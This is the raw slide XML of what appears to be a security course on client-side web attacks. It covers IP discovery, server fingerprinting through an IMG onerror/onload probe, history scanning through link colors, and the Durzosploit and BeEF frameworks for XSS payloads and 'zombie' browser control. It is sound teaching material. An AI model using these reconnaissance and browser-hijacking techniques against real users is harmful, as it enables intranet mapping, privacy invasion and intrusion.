              <a:t>Load the MyAddress.class file using an APPLET tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript now has the IP address</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fingerprinting Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port scanning found www servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>What are they running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use JavaScript to fingerprint them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most server have default graphics/files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>apache_pb.gif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>hp_invent_logo.gif</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fingerprinting Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107523" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Try to retrieve the file using an IMG tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>onerror event means the image did not exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>onload event means the graphic exists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src=http://foundip/graphic.name onerror="fprintfunction('error')" onload="fprintfunction('load')"&gt;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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are going to explore various exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Specifically focused on three categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injection exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session exploits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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sources of Defaults</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many different sources are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nikto is one excellent source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains a database of default files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Yokoso! is another source of defaults</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://yokoso.secureideas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The project is focused on fingerprinting infrastructure through XSS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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Browse History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199870" y="1756350"/>
            <a:ext cx="4724400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also uses an IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Long list of links are placed in the IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript checks if the link is displayed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>vlink </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>colors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3877BF48-DCC3-49F8-BBA6-B8EC74492032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5103221" y="1428140"/>
            <a:ext cx="3992928" cy="4318690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses for History Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are multiple uses for history scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets for cache poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Find administrative users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Map intranet sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discover network devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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685800" y="47470"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Durzosploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="169890" y="1159240"/>
            <a:ext cx="8763000" cy="2895600"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Durzosploit is similar to Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But its focused on creating XSS payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It has a number of prepackaged exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Simple to build new ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Powerful obfuscators to help hide attack payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Again, simple to add new ones to the engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A9FB38-9F18-478A-96B0-4ADD86BF7637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="543776" y="3973819"/>
            <a:ext cx="7914424" cy="2604747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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1975393"/>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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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12646"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91140"/>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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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XSS Frameworks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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18790"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploit Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client side scripts are very powerful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s make it easier to leverage this power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Frameworks will do the heavy lifting for us</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Frameworks Covered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are many frameworks available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More frameworks are released all the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will explore one of the best frameworks next</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Zombies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338530" y="1771340"/>
            <a:ext cx="5257800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Similar to Bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Control of the browser is provided to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Based on the framework used, we can perform many attacks through zombie browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1218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8790" y="2057400"/>
            <a:ext cx="2895600" cy="217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40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="228600"/>
            <a:ext cx="3429000" cy="6324600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="50195"/>
            </a:schemeClr>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FontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099"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89707" y="2057400"/>
            <a:ext cx="8458200" cy="44196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b="1" i="1" u="sng"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32102"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1981200"/>
            <a:ext cx="8458200" cy="44958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6246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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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8438" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3275013" y="6246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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107430" y="1394090"/>
            <a:ext cx="4495800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Browser Exploitation Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>by Wade Alcorn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://beefproject.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very powerful framework  due to the inter-protocol features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Focuses on payload delivery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133124" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4465638" y="4591360"/>
            <a:ext cx="4648200"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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-34290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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Current stable version is Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Older PHP still common</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13312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0738" y="1466540"/>
            <a:ext cx="4483100" cy="321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bwMode="gray">
          <a:xfrm>
            <a:off x="219075" y="1327673"/>
            <a:ext cx="8894763" cy="213817"/>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Times New Roman" pitchFamily="18"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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171140" y="1327673"/>
            <a:ext cx="4267200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
